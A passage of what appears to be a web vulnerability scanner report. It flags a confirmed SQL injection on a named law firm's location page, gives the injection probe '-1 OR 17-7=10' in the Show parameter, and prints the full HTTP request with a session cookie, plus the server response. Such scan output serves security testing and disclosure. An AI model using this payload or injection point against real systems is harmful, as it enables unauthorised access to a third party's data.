PC9zdHJvbmdcPiBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+Rm9sbG93IHNpZ25zIGZvciBOSiBUdXJucGlrZSBTb3V0aCB0byBFeGl0IDE1Vy1Sb3V0ZSAyODAgV2VzdC4gQ29udGludWUgYXBwcm94aW1hdGVseSAyJiMxODlcOyBtaWxlcyB0byBleGl0IDE1IC0gUm91dGUgMjEgU291dGgtTmV3YXJrLiBQcm9jZWVkaW5nIGRvd24gZXhpdCByYW1wIHN0YXkgdG8geW91ciBsZWZ0IGZvbGxvd2luZyBzaWducyBmb3IgUnQuIDIxIFNvdXRoIGFuZCB0aGUgTi4gSi4gUGVyZm9ybWluZyBBcnRzIENlbnRlciAoc2hhcnAgY3VydmUgdG8gdGhlIGxlZnQpIHRvIGJvdHRvbSBvZiByYW1wLiBUdXJuIHJpZ2h0IChNY0NhcnRlciBIaWdod2F5KSBhbmQgY29udGludWUgYXBwcm94aW1hdGVseSAxIG1pbGUgdG8gaW50ZXJzZWN0aW9uIG9mIChNY0NhcnRlciBIaWdod2F5L01hcmtldCBTdHJlZXQpLiZuYnNwXDsgTWFrZSBhIHJpZ2h0IG9udG8gKE1hcmtldCBTdHJlZXQpIGFuZCBwcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyByaWdodCBpbnRvIHRoZSBtb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCBiZWZvcmUgdGhlIG5leHQmbmJzcFw7dHJhZmZpYyBsaWdodCkuJm5ic3BcOyZuYnNwXDtBIH..
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=-1+OR+17-7%3d10&sortby=3&by=3&t..

Parameters

Parameter Type Value
PrintPage GET True
Show GET -1 OR 17-7=10
sortby GET 3
by GET 3
title GET 3
related GET 3
__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Request

POST /new/showlocationnew.aspx?PrintPage=True&Show=-1+OR+17-7%3d10&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=1433&sortby=&by=&title=&related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34224



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
